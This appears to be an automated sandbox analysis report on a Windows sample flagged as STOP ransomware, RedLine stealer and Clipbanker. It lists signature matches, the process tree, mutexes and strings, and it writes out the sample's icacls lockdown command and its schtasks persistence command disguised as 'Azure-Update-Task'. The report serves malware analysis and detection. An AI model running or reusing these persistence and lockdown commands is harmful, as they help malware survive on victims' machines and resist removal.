Source: 00000011.00000002.1981619549.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.1870730144.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000003.00000002.1652876016.000000000441E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1628654696.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.3618417381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001F.00000002.3619170404.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.1660011852.0000000004577000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.1871352690.000000000084D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1803890578.0000000004434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 1020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 2004, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@44/1444@9/5

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_042647C6 CreateToolhelp32Snapshot,Module32First,

0_2_042647C6

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: F:\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Command line argument: F:\	1_2_00419F90

Source: UXNob1Dp32.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: UXNob1Dp32.exe

Virustotal: Detection: 42%

Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions
Source: UXNob1Dp32.exe	String found in binary or memory: set-addPolicy
Source: UXNob1Dp32.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File read: C:\Users\user\Desktop\UXNob1Dp32.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\Desktop\UXNob1Dp32.exe "C:\Users\user\Desktop\UXNob1Dp32.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"	Jump to behavior
